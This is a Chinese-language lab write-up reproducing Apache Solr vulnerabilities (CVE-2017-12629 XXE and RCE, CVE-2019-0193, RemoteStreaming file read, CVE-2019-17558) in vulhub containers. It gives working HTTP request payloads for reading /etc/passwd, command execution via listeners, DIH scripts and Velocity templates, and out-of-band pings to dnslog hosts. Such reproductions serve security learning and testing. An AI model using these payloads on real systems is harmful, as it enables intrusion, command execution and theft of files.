solr漏洞复现

solr是什么

Solr 是开源的,基于 Lucene Java 的搜索服务器。

易于加入到 Web 应用程序中,会生成基于HTTP 的管理界面。
后台管理界面Dashboard仪表盘中,可查看当前Solr的版本信息。
(概念详解,移步传送门)

环境

漏洞复现环境均使用vulhub中的环境

CVE-2017-12629-XXE

影响版本

Apache Solr < 7.1
Apache Lucene < 7.1

复现过程

启动环境后打开管理界面:http://192.168.77.128:8983/solr/#/
solr-spec版本:7.0.1,lucene-spec版本:7.0.1,符合漏洞要求

利用外部实体读取敏感文件信息

  1. 开一个web服务,在下面创建一个1.dtd文件,文件内容如下
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">
  1. 读取Linux下/etc/passwd文件信息
    引用外部实体
    payload:http://192.168.77.128:8983/solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f192.168.77.128%2f1.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser
    URL解码后:
    http://192.168.77.128:8983/solr/demo/select?&q=<?xml+version="1.0"+?><!DOCTYPE+root[<!ENTITY+%+ext+SYSTEM+"http://192.168.77.128/1.dtd">%ext;%ent;]><r>&data;</r>&wt=xml&defType=xmlparser
    执行payload,获取文件信息成功

本地DTD读取文件

XXE之利用本地DTD进行文件读取

CVE-2017-12629-RCE

影响版本

Apache Solr < 7.1
Apache Lucene < 7.1

复现过程

触发命令执行的事件有两种:postCommit 和 newSearcher

使用newSearcher

其中demo为存在的core名称
数据包:

POST /solr/demo/config HTTP/1.1
Host: 192.168.77.128:8983
Connection: close
Content-Type: application/json
Content-Length: 178

{
"add-listener" : {
"event":"newSearcher",
"name":"newlistener1",
"class":"solr.RunExecutableListener",
"exe":"ping",
"dir":"/usr/bin/",
"args":["3pqsrm.dnslog.cn"]
}
}




使用postCommit

数据包1:

POST /solr/demo/config HTTP/1.1
Host: 192.168.77.128:8983
Connection: close
Content-Type: application/json
Content-Length: 177

{
"add-listener" : {
"event":"postCommit",
"name":"newlistener3",
"class":"solr.RunExecutableListener",
"exe":"ping",
"dir":"/usr/bin/",
"args":["3pqsrm.dnslog.cn"]
}
}



发送该请求后一直没有返回数据,取消重发会回显该name已经存在,所以发送第二个数据包

数据包2(数据随便输):

POST /solr/demo/update HTTP/1.1
Host: 192.168.77.128:8983
Connection: close
Content-Type: application/json
Content-Length: 17

[{"id":"test"
}]



更新后发现两条记录都在(之前因为没有返回数据又试了一次)

CVE-2019-0193

影响版本

Apache solr < 8.2.0

复现过程

在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制

vulhub环境下,进入后会让我们新建一个core

我们需要在服务器中新建,这里新建会报错找不到配置文件
新建test core命令
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

刷新页面即可看见新建的core
根据以下步骤进行代码执行

exp:

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("ping 0ytihf.dnslog.cn");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

执行成功后,上方会出现绿色修勾勾

命令执行成功

Remote-Streaming-Fileread(任意文件读取)

复现过程

  1. 获取cores
GET /solr/admin/cores?_=1637649371526&show=schema&wt=json HTTP/1.1
Host: 192.168.8.128:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.8.128:8983/solr/
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close



存在的core名为demo

  1. 修改demo的配置,开启RemoteStreaming
POST /solr/demo/config?_=1637649371526&show=schema&wt=json HTTP/1.1
Host: 192.168.8.128:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.8.128:8983/solr/
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Content-Length: 82

{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

当出现以下信息时,表示漏洞可能存在:
This response format is experimental. It is likely to change in the future

3.读取敏感文件
数据包:

GET /solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
Host: 192.168.8.128:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.8.128:8983/solr/
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Content-Length: 0



读取成功

CVE-2019-17558

影响版本

5.0.0 <=Apache Solr<= 8.3.1

漏洞复现

用户可以注入自定义模板,通过Velocity模板语言执行任意命令

  1. 获取core
    当前存在的core为demo

  2. 修改demo的配置,开启params.resource.loader.enabled配置
    数据包:

POST /solr/demo/config?_=1637649371526&show=schema&wt=json HTTP/1.1
Host: 192.168.8.128:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.8.128:8983/solr/
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Content-Length: 261
Content-Type:application/json


{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}



  1. Velocity模板代码注入
    数据包:
GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 192.168.8.128:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.8.128:8983/solr/
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close



命令执行成功

传送门:

搜索引擎Solr介绍
Lucene就是这么简单
cve-2017-12629 apache solr xxe & rce 漏洞分析(6)

Copyright (c)milkii0

posted @ 2022-07-19 09:46  milkii0  阅读(1002)  评论(0编辑  收藏  举报